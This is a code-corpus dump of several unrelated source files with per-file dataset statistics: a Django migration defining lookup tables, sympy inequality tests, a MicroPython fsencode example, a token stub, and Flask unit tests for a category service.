('updated_by', models.ForeignKey(blank=True, db_column='updated_by', limit_choices_to=models.Q(('is_staff', 0), ('is_superuser', 0), _negated=True), null=True, on_delete=django.db.models.deletion.CASCADE, related_name='updated_unitofmeasurements', to=settings.AUTH_USER_MODEL, verbose_name='Updated By')),
],
options={
'verbose_name': ' Unit Of Measurement',
'verbose_name_plural': ' Unit Of Measurement',
'db_table': 'unit_of_measurement',
},
),
migrations.CreateModel(
name='RatingParameter',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
('is_active', models.BooleanField(default=True)),
('meta_title', models.CharField(blank=True, max_length=250, null=True, verbose_name='Meta Title')),
('meta_description', models.TextField(blank=True, null=True, verbose_name='Meta Description')),
('keywords', models.CharField(blank=True, max_length=250, null=True, verbose_name='Keyword')),
('rating_parameter', models.CharField(max_length=100, unique=True, verbose_name='Rating Parameter Name')),
('rating_parameter_value', models.IntegerField(null=True, unique=True, validators=[django.core.validators.MaxValueValidator(5), django.core.validators.MinValueValidator(1)], verbose_name='Rating Points')),
('created_by', models.ForeignKey(blank=True, db_column='created_by', limit_choices_to=models.Q(('is_staff', 0), ('is_superuser', 0), _negated=True), null=True, on_delete=django.db.models.deletion.CASCADE, related_name='created_ratingparameters', to=settings.AUTH_USER_MODEL, verbose_name='Created By')),
('updated_by', models.ForeignKey(blank=True, db_column='updated_by', limit_choices_to=models.Q(('is_staff', 0), ('is_superuser', 0), _negated=True), null=True, on_delete=django.db.models.deletion.CASCADE, related_name='updated_ratingparameters', to=settings.AUTH_USER_MODEL, verbose_name='Updated By')),
],
options={
'verbose_name': 'Rating Parameters',
'verbose_name_plural': 'Rating Parameters',
'db_table': 'rating_parameter_configuration',
},
),
migrations.CreateModel(
name='ParameterSetting',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
('is_active', models.BooleanField(default=True)),
('meta_title', models.CharField(blank=True, max_length=250, null=True, verbose_name='Meta Title')),
('meta_description', models.TextField(blank=True, null=True, verbose_name='Meta Description')),
('keywords', models.CharField(blank=True, max_length=250, null=True, verbose_name='Keyword')),
('prefix', models.CharField(max_length=4, verbose_name='Inquiry Prefix')),
('created_by', models.ForeignKey(blank=True, db_column='created_by', limit_choices_to=models.Q(('is_staff', 0), ('is_superuser', 0), _negated=True), null=True, on_delete=django.db.models.deletion.CASCADE, related_name='created_parametersettings', to=settings.AUTH_USER_MODEL, verbose_name='Created By')),
('updated_by', models.ForeignKey(blank=True, db_column='updated_by', limit_choices_to=models.Q(('is_staff', 0), ('is_superuser', 0), _negated=True), null=True, on_delete=django.db.models.deletion.CASCADE, related_name='updated_parametersettings', to=settings.AUTH_USER_MODEL, verbose_name='Updated By')),
],
options={
'verbose_name': 'Parameter Setting',
'verbose_name_plural': 'Parameter Setting',
'db_table': 'parameter_settings',
},
),
migrations.CreateModel(
name='Language',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
('is_active', models.BooleanField(default=True)),
('meta_title', models.CharField(blank=True, max_length=250, null=True, verbose_name='Meta Title')),
('meta_description', models.TextField(blank=True, null=True, verbose_name='Meta Description')),
('keywords', models.CharField(blank=True, max_length=250, null=True, verbose_name='Keyword')),
('language_code', models.CharField(max_length=70, unique=True)),
('language_name', models.CharField(max_length=70, unique=True, verbose_name='Language')),
('created_by', models.ForeignKey(blank=True, db_column='created_by', limit_choices_to=models.Q(('is_staff', 0), ('is_superuser', 0), _negated=True), null=True, on_delete=django.db.models.deletion.CASCADE, related_name='created_languages', to=settings.AUTH_USER_MODEL, verbose_name='Created By')),
('updated_by', models.ForeignKey(blank=True, db_column='updated_by', limit_choices_to=models.Q(('is_staff', 0), ('is_superuser', 0), _negated=True), null=True, on_delete=django.db.models.deletion.CASCADE, related_name='updated_languages', to=settings.AUTH_USER_MODEL, verbose_name='Updated By')),
],
options={
'verbose_name': 'Language Configuration',
'verbose_name_plural': 'Language Configuration',
'db_table': 'language_configuration',
},
),
migrations.CreateModel(
name='CurrencyMaster',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
('is_active', models.BooleanField(default=True)),
('meta_title', models.CharField(blank=True, max_length=250, null=True, verbose_name='Meta Title')),
('meta_description', models.TextField(blank=True, null=True, verbose_name='Meta Description')),
('keywords', models.CharField(blank=True, max_length=250, null=True, verbose_name='Keyword')),
('currency', models.CharField(max_length=30, unique=True, verbose_name='Currency Name')),
('symbol', models.CharField(max_length=30)),
('code_iso', models.CharField(blank=True, max_length=30, null=True, verbose_name='Code ISO')),
('hex_symbol', models.CharField(blank=True, max_length=30, null=True, verbose_name='Hex Code')),
('created_by', models.ForeignKey(blank=True, db_column='created_by', limit_choices_to=models.Q(('is_staff', 0), ('is_superuser', 0), _negated=True), null=True, on_delete=django.db.models.deletion.CASCADE, related_name='created_currencymasters', to=settings.AUTH_USER_MODEL, verbose_name='Created By')),
('updated_by', models.ForeignKey(blank=True, db_column='updated_by', limit_choices_to=models.Q(('is_staff', 0), ('is_superuser', 0), _negated=True), null=True, on_delete=django.db.models.deletion.CASCADE, related_name='updated_currencymasters', to=settings.AUTH_USER_MODEL, verbose_name='Updated By')),
],
options={
'verbose_name': 'Currency Master',
'verbose_name_plural': 'Currency Master',
'db_table': 'currency_master',
},
),
migrations.CreateModel(
name='ContactTypesReasons',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
('is_active', models.BooleanField(default=True)),
('meta_title', models.CharField(blank=True, max_length=250, null=True, verbose_name='Meta Title')),
('meta_description', models.TextField(blank=True, null=True, verbose_name='Meta Description')),
('keywords', models.CharField(blank=True, max_length=250, null=True, verbose_name='Keyword')),
('contact_reasons', models.CharField(max_length=100, unique=True, verbose_name='contact type Reasons')),
('created_by', models.ForeignKey(blank=True, db_column='created_by', limit_choices_to=models.Q(('is_staff', 0), ('is_superuser', 0), _negated=True), null=True, on_delete=django.db.models.deletion.CASCADE, related_name='created_contacttypesreasonss', to=settings.AUTH_USER_MODEL, verbose_name='Created By')),
('updated_by', models.ForeignKey(blank=True, db_column='updated_by', limit_choices_to=models.Q(('is_staff', 0), ('is_superuser', 0), _negated=True), null=True, on_delete=django.db.models.deletion.CASCADE, related_name='updated_contacttypesreasonss', to=settings.AUTH_USER_MODEL, verbose_name='Updated By')),
],
options={
'verbose_name': 'Contact/Inquiry Type Reasons',
'verbose_name_plural': 'Contact/Inquiry Type Reasons',
'db_table': 'contact_types_reasons',
},
),
migrations.CreateModel(
name='CancellationReason',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
('is_active', models.BooleanField(default=True)),
('meta_title', models.CharField(blank=True, max_length=250, null=True, verbose_name='Meta Title')),
('meta_description', models.TextField(blank=True, null=True, verbose_name='Meta Description')),
('keywords', models.CharField(blank=True, max_length=250, null=True, verbose_name='Keyword')),
('cancel_reason_name', models.CharField(max_length=100, verbose_name='Cancellation Reason')),
('cancel_reason_for', models.CharField(max_length=255)),
('cancel_reason_details', models.CharField(blank=True, max_length=255, null=True, verbose_name='Description')),
('created_by', models.ForeignKey(blank=True, db_column='created_by', limit_choices_to=models.Q(('is_staff', 0), ('is_superuser', 0), _negated=True), null=True, on_delete=django.db.models.deletion.CASCADE, related_name='created_cancellationreasons', to=settings.AUTH_USER_MODEL, verbose_name='Created By')),
('updated_by', models.ForeignKey(blank=True, db_column='updated_by', limit_choices_to=models.Q(('is_staff', 0), ('is_superuser', 0), _negated=True), null=True, on_delete=django.db.models.deletion.CASCADE, related_name='updated_cancellationreasons', to=settings.AUTH_USER_MODEL, verbose_name='Updated By')),
],
options={
'verbose_name': 'Cancellation Reasons',
'verbose_name_plural': 'Cancellation Reasons',
'db_table': 'cancellation_reason_configuration',
},
),
migrations.CreateModel(
name='BusinessType',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
('is_active', models.BooleanField(default=True)),
('meta_title', models.CharField(blank=True, max_length=250, null=True, verbose_name='Meta Title')),
('meta_description', models.TextField(blank=True, null=True, verbose_name='Meta Description')),
('keywords', models.CharField(blank=True, max_length=250, null=True, verbose_name='Keyword')),
('business_type', models.CharField(max_length=50, unique=True)),
('description', models.CharField(blank=True, max_length=200, null=True)),
('created_by', models.ForeignKey(blank=True, db_column='created_by', limit_choices_to=models.Q(('is_staff', 0), ('is_superuser', 0), _negated=True), null=True, on_delete=django.db.models.deletion.CASCADE, related_name='created_businesstypes', to=settings.AUTH_USER_MODEL, verbose_name='Created By')),
('updated_by', models.ForeignKey(blank=True, db_column='updated_by', limit_choices_to=models.Q(('is_staff', 0), ('is_superuser', 0), _negated=True), null=True, on_delete=django.db.models.deletion.CASCADE, related_name='updated_businesstypes', to=settings.AUTH_USER_MODEL, verbose_name='Updated By')),
],
options={
'verbose_name': 'Business Type',
'verbose_name_plural': 'Business Type',
'db_table': 'business_type_manager',
'ordering': ['business_type'],
},
),
]
| 80.510526 | 323 | 0.649474 | 1,744 | 15,297 | 5.441514 | 0.081995 | 0.085775 | 0.048999 | 0.054057 | 0.803161 | 0.796733 | 0.793256 | 0.778082 | 0.751317 | 0.741201 | 0 | 0.011291 | 0.206773 | 15,297 | 189 | 324 | 80.936508 | 0.770809 | 0.002942 | 0 | 0.538462 | 1 | 0 | 0.215607 | 0.033967 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.021978 | 0 | 0.043956 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
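
For orientation, each CreateModel operation above corresponds to an ordinary model class. The sketch below reconstructs UnitOfMeasurement from its migration; it is a plausible reconstruction, since the project's models.py is not shown, and the created_by/updated_by audit foreign keys are abbreviated.

from django.db import models

class UnitOfMeasurement(models.Model):
    # Timestamps and flags shared by every table in this migration.
    created_at = models.DateTimeField(auto_now_add=True)
    updated_at = models.DateTimeField(auto_now=True)
    is_active = models.BooleanField(default=True)
    # SEO-style metadata fields, also common to every table above.
    meta_title = models.CharField(blank=True, max_length=250, null=True, verbose_name='Meta Title')
    meta_description = models.TextField(blank=True, null=True, verbose_name='Meta Description')
    keywords = models.CharField(blank=True, max_length=250, null=True, verbose_name='Keyword')
    # Fields specific to this model.
    unit_measurement = models.CharField(max_length=30, unique=True)
    short_form = models.CharField(max_length=10)
    description = models.CharField(blank=True, max_length=200, null=True)
    # created_by/updated_by ForeignKey(settings.AUTH_USER_MODEL) omitted for brevity.

    class Meta:
        db_table = 'unit_of_measurement'
        verbose_name = ' Unit Of Measurement'
        verbose_name_plural = ' Unit Of Measurement'
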
5b0d3ccdaba9e0a34f03337d87911d9c03dc2423 | 9,694 | py | Python | sympy/solvers/tests/test_inequalities.py | pernici/sympy | 5e6e3b71da777f5b85b8ca2d16f33ed020cf8a41 | [
"BSD-3-Clause"
] | null | null | null | sympy/solvers/tests/test_inequalities.py | pernici/sympy | 5e6e3b71da777f5b85b8ca2d16f33ed020cf8a41 | [
"BSD-3-Clause"
] | null | null | null | sympy/solvers/tests/test_inequalities.py | pernici/sympy | 5e6e3b71da777f5b85b8ca2d16f33ed020cf8a41 | [
"BSD-3-Clause"
] | null | null | null | """Tests for tools for solving inequalities and systems of inequalities. """
from sympy.solvers.inequalities import (
reduce_poly_inequalities,
reduce_inequalities)
from sympy import (
S, Symbol, Interval, Eq, Ne, Lt, Le, Gt, Ge, Or, And, pi, oo,
sqrt, Q, Assume, global_assumptions, re, im, sin)
from sympy.utilities.pytest import raises
from sympy.abc import x, y
inf = oo.evalf()
x_assume = Assume(x, Q.real)
y_assume = Assume(y, Q.real)
def test_reduce_poly_inequalities_real_interval():
global_assumptions.add(x_assume)
global_assumptions.add(y_assume)
assert reduce_poly_inequalities([[Eq(x**2, 0)]], x, relational=False) == [Interval(0, 0)]
assert reduce_poly_inequalities([[Le(x**2, 0)]], x, relational=False) == [Interval(0, 0)]
assert reduce_poly_inequalities([[Lt(x**2, 0)]], x, relational=False) == []
assert reduce_poly_inequalities([[Ge(x**2, 0)]], x, relational=False) == [Interval(-oo, oo)]
assert reduce_poly_inequalities([[Gt(x**2, 0)]], x, relational=False) == [Interval(-oo, 0, right_open=True), Interval(0, oo, left_open=True)]
assert reduce_poly_inequalities([[Ne(x**2, 0)]], x, relational=False) == [Interval(-oo, 0, right_open=True), Interval(0, oo, left_open=True)]
assert reduce_poly_inequalities([[Eq(x**2, 1)]], x, relational=False) == [Interval(-1,-1), Interval(1, 1)]
assert reduce_poly_inequalities([[Le(x**2, 1)]], x, relational=False) == [Interval(-1, 1)]
assert reduce_poly_inequalities([[Lt(x**2, 1)]], x, relational=False) == [Interval(-1, 1, True, True)]
assert reduce_poly_inequalities([[Ge(x**2, 1)]], x, relational=False) == [Interval(-oo, -1), Interval(1, oo)]
assert reduce_poly_inequalities([[Gt(x**2, 1)]], x, relational=False) == [Interval(-oo, -1, right_open=True), Interval(1, oo, left_open=True)]
assert reduce_poly_inequalities([[Ne(x**2, 1)]], x, relational=False) == [Interval(-oo, -1, right_open=True), Interval(-1, 1, True, True), Interval(1, oo, left_open=True)]
assert reduce_poly_inequalities([[Eq(x**2, 1.0)]], x, relational=False) == [Interval(-1.0,-1.0), Interval(1.0, 1.0)]
assert reduce_poly_inequalities([[Le(x**2, 1.0)]], x, relational=False) == [Interval(-1.0, 1.0)]
assert reduce_poly_inequalities([[Lt(x**2, 1.0)]], x, relational=False) == [Interval(-1.0, 1.0, True, True)]
assert reduce_poly_inequalities([[Ge(x**2, 1.0)]], x, relational=False) == [Interval(-inf, -1.0), Interval(1.0, inf)]
assert reduce_poly_inequalities([[Gt(x**2, 1.0)]], x, relational=False) == [Interval(-inf, -1.0, right_open=True), Interval(1.0, inf, left_open=True)]
assert reduce_poly_inequalities([[Ne(x**2, 1.0)]], x, relational=False) == [Interval(-inf, -1.0, right_open=True), Interval(-1.0, 1.0, True, True), Interval(1.0, inf, left_open=True)]
s = sqrt(2)
assert reduce_poly_inequalities([[Lt(x**2 - 1, 0), Gt(x**2 - 1, 0)]], x, relational=False) == []
assert reduce_poly_inequalities([[Le(x**2 - 1, 0), Ge(x**2 - 1, 0)]], x, relational=False) == [Interval(-1,-1), Interval(1, 1)]
assert reduce_poly_inequalities([[Le(x**2 - 2, 0), Ge(x**2 - 1, 0)]], x, relational=False) == [Interval(-s, -1, False, False), Interval(1, s, False, False)]
assert reduce_poly_inequalities([[Le(x**2 - 2, 0), Gt(x**2 - 1, 0)]], x, relational=False) == [Interval(-s, -1, False, True), Interval(1, s, True, False)]
assert reduce_poly_inequalities([[Lt(x**2 - 2, 0), Ge(x**2 - 1, 0)]], x, relational=False) == [Interval(-s, -1, True, False), Interval(1, s, False, True)]
assert reduce_poly_inequalities([[Lt(x**2 - 2, 0), Gt(x**2 - 1, 0)]], x, relational=False) == [Interval(-s, -1, True, True), Interval(1, s, True, True)]
assert reduce_poly_inequalities([[Lt(x**2 - 2, 0), Ne(x**2 - 1, 0)]], x, relational=False) == [Interval(-s, -1, True, True), Interval(-1, 1, True, True), Interval(1, s, True, True)]
global_assumptions.remove(x_assume)
global_assumptions.remove(y_assume)
def test_reduce_poly_inequalities_real_relational():
global_assumptions.add(x_assume)
global_assumptions.add(y_assume)
assert reduce_poly_inequalities([[Eq(x**2, 0)]], x, relational=True) == Eq(x, 0)
assert reduce_poly_inequalities([[Le(x**2, 0)]], x, relational=True) == Eq(x, 0)
assert reduce_poly_inequalities([[Lt(x**2, 0)]], x, relational=True) == False
assert reduce_poly_inequalities([[Ge(x**2, 0)]], x, relational=True) == True
assert reduce_poly_inequalities([[Gt(x**2, 0)]], x, relational=True) == Or(Lt(x, 0), Lt(0, x))
assert reduce_poly_inequalities([[Ne(x**2, 0)]], x, relational=True) == Or(Lt(x, 0), Lt(0, x))
assert reduce_poly_inequalities([[Eq(x**2, 1)]], x, relational=True) == Or(Eq(x, -1), Eq(x, 1))
assert reduce_poly_inequalities([[Le(x**2, 1)]], x, relational=True) == And(Le(-1, x), Le(x, 1))
assert reduce_poly_inequalities([[Lt(x**2, 1)]], x, relational=True) == And(Lt(-1, x), Lt(x, 1))
assert reduce_poly_inequalities([[Ge(x**2, 1)]], x, relational=True) == Or(Le(x, -1), Le(1, x))
assert reduce_poly_inequalities([[Gt(x**2, 1)]], x, relational=True) == Or(Lt(x, -1), Lt(1, x))
assert reduce_poly_inequalities([[Ne(x**2, 1)]], x, relational=True) == Or(Lt(x, -1), And(Lt(-1, x), Lt(x, 1)), Lt(1, x))
assert reduce_poly_inequalities([[Eq(x**2, 1.0)]], x, relational=True) == Or(Eq(x, -1.0), Eq(x, 1.0))
assert reduce_poly_inequalities([[Le(x**2, 1.0)]], x, relational=True) == And(Le(-1.0, x), Le(x, 1.0))
assert reduce_poly_inequalities([[Lt(x**2, 1.0)]], x, relational=True) == And(Lt(-1.0, x), Lt(x, 1.0))
assert reduce_poly_inequalities([[Ge(x**2, 1.0)]], x, relational=True) == Or(Le(x, -1.0), Le(1.0, x))
assert reduce_poly_inequalities([[Gt(x**2, 1.0)]], x, relational=True) == Or(Lt(x, -1.0), Lt(1.0, x))
assert reduce_poly_inequalities([[Ne(x**2, 1.0)]], x, relational=True) == Or(Lt(x, -1.0), And(Lt(-1.0, x), Lt(x, 1.0)), Lt(1.0, x))
global_assumptions.remove(x_assume)
global_assumptions.remove(y_assume)
def test_reduce_poly_inequalities_complex_relational():
cond = Eq(im(x), 0)
assert reduce_poly_inequalities([[Eq(x**2, 0)]], x, relational=True) == And(Eq(re(x), 0), cond)
assert reduce_poly_inequalities([[Le(x**2, 0)]], x, relational=True) == And(Eq(re(x), 0), cond)
assert reduce_poly_inequalities([[Lt(x**2, 0)]], x, relational=True) == False
assert reduce_poly_inequalities([[Ge(x**2, 0)]], x, relational=True) == cond
assert reduce_poly_inequalities([[Gt(x**2, 0)]], x, relational=True) == And(Or(Lt(re(x), 0), Lt(0, re(x))), cond)
assert reduce_poly_inequalities([[Ne(x**2, 0)]], x, relational=True) == And(Or(Lt(re(x), 0), Lt(0, re(x))), cond)
assert reduce_poly_inequalities([[Eq(x**2, 1)]], x, relational=True) == And(Or(Eq(re(x), -1), Eq(re(x), 1)), cond)
assert reduce_poly_inequalities([[Le(x**2, 1)]], x, relational=True) == And(And(Le(-1, re(x)), Le(re(x), 1)), cond)
assert reduce_poly_inequalities([[Lt(x**2, 1)]], x, relational=True) == And(And(Lt(-1, re(x)), Lt(re(x), 1)), cond)
assert reduce_poly_inequalities([[Ge(x**2, 1)]], x, relational=True) == And(Or(Le(re(x), -1), Le(1, re(x))), cond)
assert reduce_poly_inequalities([[Gt(x**2, 1)]], x, relational=True) == And(Or(Lt(re(x), -1), Lt(1, re(x))), cond)
assert reduce_poly_inequalities([[Ne(x**2, 1)]], x, relational=True) == And(Or(Lt(re(x), -1), And(Lt(-1, re(x)), Lt(re(x), 1)), Lt(1, re(x))), cond)
assert reduce_poly_inequalities([[Eq(x**2, 1.0)]], x, relational=True) == And(Or(Eq(re(x), -1.0), Eq(re(x), 1.0)), cond)
assert reduce_poly_inequalities([[Le(x**2, 1.0)]], x, relational=True) == And(And(Le(-1.0, re(x)), Le(re(x), 1.0)), cond)
assert reduce_poly_inequalities([[Lt(x**2, 1.0)]], x, relational=True) == And(And(Lt(-1.0, re(x)), Lt(re(x), 1.0)), cond)
assert reduce_poly_inequalities([[Ge(x**2, 1.0)]], x, relational=True) == And(Or(Le(re(x), -1.0), Le(1.0, re(x))), cond)
assert reduce_poly_inequalities([[Gt(x**2, 1.0)]], x, relational=True) == And(Or(Lt(re(x), -1.0), Lt(1.0, re(x))), cond)
assert reduce_poly_inequalities([[Ne(x**2, 1.0)]], x, relational=True) == And(Or(Lt(re(x), -1.0), And(Lt(-1.0, re(x)), Lt(re(x), 1.0)), Lt(1.0, re(x))), cond)
def test_reduce_abs_inequalities():
real = Assume(x, Q.real)
assert reduce_inequalities(abs(x - 5) < 3, assume=real) == And(Gt(x, 2), Lt(x, 8))
assert reduce_inequalities(abs(2*x + 3) >= 8, assume=real) == Or(Le(x, -S(11)/2), Ge(x, S(5)/2))
assert reduce_inequalities(abs(x - 4) + abs(3*x - 5) < 7, assume=real) == And(Gt(x, S(1)/2), Lt(x, 4))
assert reduce_inequalities(abs(x - 4) + abs(3*abs(x) - 5) < 7, assume=real) == Or(And(-2 < x, x < -1), And(S(1)/2 < x, x < 4))
raises(NotImplementedError, "reduce_inequalities(abs(x - 5) < 3)")
def test_reduce_inequalities_boolean():
assert reduce_inequalities([Eq(x**2, 0), True]) == And(Eq(re(x), 0), Eq(im(x), 0))
assert reduce_inequalities([Eq(x**2, 0), False]) == False
def test_reduce_inequalities_assume():
assert reduce_inequalities([Le(x**2, 1), Assume(x, Q.real)]) == And(Le(-1, x), Le(x, 1))
assert reduce_inequalities([Le(x**2, 1)], Assume(x, Q.real)) == And(Le(-1, x), Le(x, 1))
def test_reduce_inequalities_multivariate():
assert reduce_inequalities([Ge(x**2, 1), Ge(y**2, 1)]) == \
And(And(Or(Le(re(x), -1), Le(1, re(x))), Eq(im(x), 0)),
And(Or(Le(re(y), -1), Le(1, re(y))), Eq(im(y), 0)))
def test_reduce_inequalities_errors():
raises(NotImplementedError, "reduce_inequalities(Ge(sin(x) + x, 1))")
raises(NotImplementedError, "reduce_inequalities(Ge(x**2*y + y, 1))")
raises(NotImplementedError, "reduce_inequalities(Ge(sqrt(2)*x, 1))")
| 71.279412 | 187 | 0.630493 | 1,667 | 9,694 | 3.547091 | 0.041992 | 0.025368 | 0.24184 | 0.288855 | 0.87333 | 0.840859 | 0.800947 | 0.782513 | 0.751057 | 0.694233 | 0 | 0.047443 | 0.136786 | 9,694 | 135 | 188 | 71.807407 | 0.659178 | 0.007118 | 0 | 0.09434 | 0 | 0 | 0.015388 | 0.012061 | 0 | 0 | 0 | 0 | 0.660377 | 1 | 0.075472 | false | 0 | 0.037736 | 0 | 0.113208 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
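
An abridged, standalone usage sketch of the API these tests exercise. It targets the same (older) sympy interface, in which real-domain reduction requires an explicit Assume on the symbol.

from sympy import Q, Assume, global_assumptions, Le
from sympy.abc import x
from sympy.solvers.inequalities import reduce_poly_inequalities

real_x = Assume(x, Q.real)
global_assumptions.add(real_x)
# The double list groups conjunctions of inequalities over one generator;
# relational=False returns Interval objects instead of And/Or expressions.
result = reduce_poly_inequalities([[Le(x**2, 1)]], x, relational=False)
print(result)  # per the tests above: [Interval(-1, 1)]
global_assumptions.remove(real_x)
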
960816f8d6cd6de831155055f5b68fcab126ccc7 | 39 | py | Python | api_token.py | image-store-org/image-store-py-web-api-consumer | 8d1f20a804172a4315f9d43e88beb0751f425dbd | [
"MIT"
] | null | null | null | api_token.py | image-store-org/image-store-py-web-api-consumer | 8d1f20a804172a4315f9d43e88beb0751f425dbd | [
"MIT"
] | 1 | 2021-01-12T22:50:20.000Z | 2021-01-18T18:20:24.000Z | api_token.py | image-store-org/image-store-py-web-api-consumer | 8d1f20a804172a4315f9d43e88beb0751f425dbd | [
"MIT"
] | null | null | null | def get_token():
return 'API_TOKEN' | 19.5 | 22 | 0.692308 | 6 | 39 | 4.166667 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.179487 | 39 | 2 | 22 | 19.5 | 0.78125 | 0 | 0 | 0 | 0 | 0 | 0.225 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 0 | 0.5 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
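
The stub above hard-codes the token. A common drop-in alternative (an assumption about intent, not code from this repository) reads it from the environment with the same placeholder as fallback:

import os

def get_token():
    # Prefer an API_TOKEN environment variable; fall back to the placeholder.
    return os.environ.get('API_TOKEN', 'API_TOKEN')
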
8254f835425587d867eae4b839f44aac440c8e9e | 118 | py | Python | os/example_fsencode.py | Carglglz/micropython-lib | 07102c56aa1087b97ee313cedc1d89fd20452e11 | [
"PSF-2.0"
] | 1,556 | 2015-01-18T01:10:21.000Z | 2022-03-31T23:27:33.000Z | unix-ffi/os/example_fsencode.py | Li-Lian1069/micropython-lib | 1dfca5ad343b2841965df6c4e59f92d6d94a24bd | [
"PSF-2.0"
] | 414 | 2015-01-01T09:01:22.000Z | 2022-03-31T15:08:24.000Z | unix-ffi/os/example_fsencode.py | Li-Lian1069/micropython-lib | 1dfca5ad343b2841965df6c4e59f92d6d94a24bd | [
"PSF-2.0"
] | 859 | 2015-02-05T13:23:00.000Z | 2022-03-28T02:28:16.000Z | import os
print(os.fsencode("abc"))
print(os.fsencode(b"abc"))
print(os.fsdecode("abc"))
print(os.fsdecode(b"abc"))
| 14.75 | 26 | 0.694915 | 20 | 118 | 4.1 | 0.35 | 0.341463 | 0.365854 | 0.439024 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.067797 | 118 | 7 | 27 | 16.857143 | 0.745455 | 0 | 0 | 0 | 0 | 0 | 0.101695 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.2 | 0 | 0.2 | 0.8 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
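
For reference, assuming the micropython-lib shim matches CPython's os.fsencode/os.fsdecode semantics, the four print calls above produce:

b'abc'
b'abc'
abc
abc

fsencode passes bytes through unchanged and encodes str with the filesystem encoding; fsdecode is the inverse.
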
825bfccff909ccf58aa93a45c175eff00624143b | 21,479 | py | Python | unit_tests/dependencies/maintain_api/test_categories.py | LandRegistry/maintain-frontend | d92446a9972ebbcd9a43a7a7444a528aa2f30bf7 | [
"MIT"
] | 1 | 2019-10-03T13:58:29.000Z | 2019-10-03T13:58:29.000Z | unit_tests/dependencies/maintain_api/test_categories.py | LandRegistry/maintain-frontend | d92446a9972ebbcd9a43a7a7444a528aa2f30bf7 | [
"MIT"
] | null | null | null | unit_tests/dependencies/maintain_api/test_categories.py | LandRegistry/maintain-frontend | d92446a9972ebbcd9a43a7a7444a528aa2f30bf7 | [
"MIT"
] | 1 | 2021-04-11T05:24:57.000Z | 2021-04-11T05:24:57.000Z | from unittest import TestCase
from unittest.mock import patch, MagicMock
from flask import g
from maintain_frontend import main
from maintain_frontend.dependencies.maintain_api.categories import CategoryService
from maintain_frontend.exceptions import ApplicationError
from unit_tests.utilities import Utilities
class TestCategories(TestCase):
def setUp(self):
self.app = main.app.test_client()
Utilities.mock_session_cookie_unittest(self)
@patch('maintain_frontend.dependencies.maintain_api.categories.MAINTAIN_API_URL', 'abc')
@patch('maintain_frontend.dependencies.maintain_api.categories.current_app')
def test_get_top_level(self, mock_current_app):
with main.app.test_request_context():
g.requests = MagicMock()
response = MagicMock()
response.status_code = 200
response.json.return_value = [
{
"permission": None,
"display-name": "Test 1",
"name": "test-1"
},
{
"permission": None,
"display-name": "Test 2",
"name": "test-2"
}
]
g.requests.get.return_value = response
response = CategoryService.get_categories()
self.assertEqual(2, len(response))
self.assertEqual("test-1", response[0]['name'])
self.assertEqual("Test 1", response[0]['display'])
self.assertEqual("test-2", response[1]['name'])
self.assertEqual("Test 2", response[1]['display'])
g.requests.get.assert_called_with("{}/categories".format('abc'))
mock_current_app.logger.info.assert_called()
@patch('maintain_frontend.dependencies.maintain_api.categories.MAINTAIN_API_URL', 'abc')
@patch('maintain_frontend.dependencies.maintain_api.categories.current_app')
def test_get_top_level_filtered_permissions(self, mock_current_app):
with main.app.test_request_context():
g.requests = MagicMock()
g.session = MagicMock()
g.session.user.permissions = []
response = MagicMock()
response.status_code = 200
response.json.return_value = [
{
"permission": "TEST-PERMISSION",
"display-name": "Test 1",
"name": "test-1"
},
{
"permission": None,
"display-name": "Test 2",
"name": "test-2"
}
]
g.requests.get.return_value = response
response = CategoryService.get_categories()
self.assertEqual(1, len(response))
self.assertEqual("test-2", response[0]['name'])
self.assertEqual("Test 2", response[0]['display'])
g.requests.get.assert_called_with("{}/categories".format('abc'))
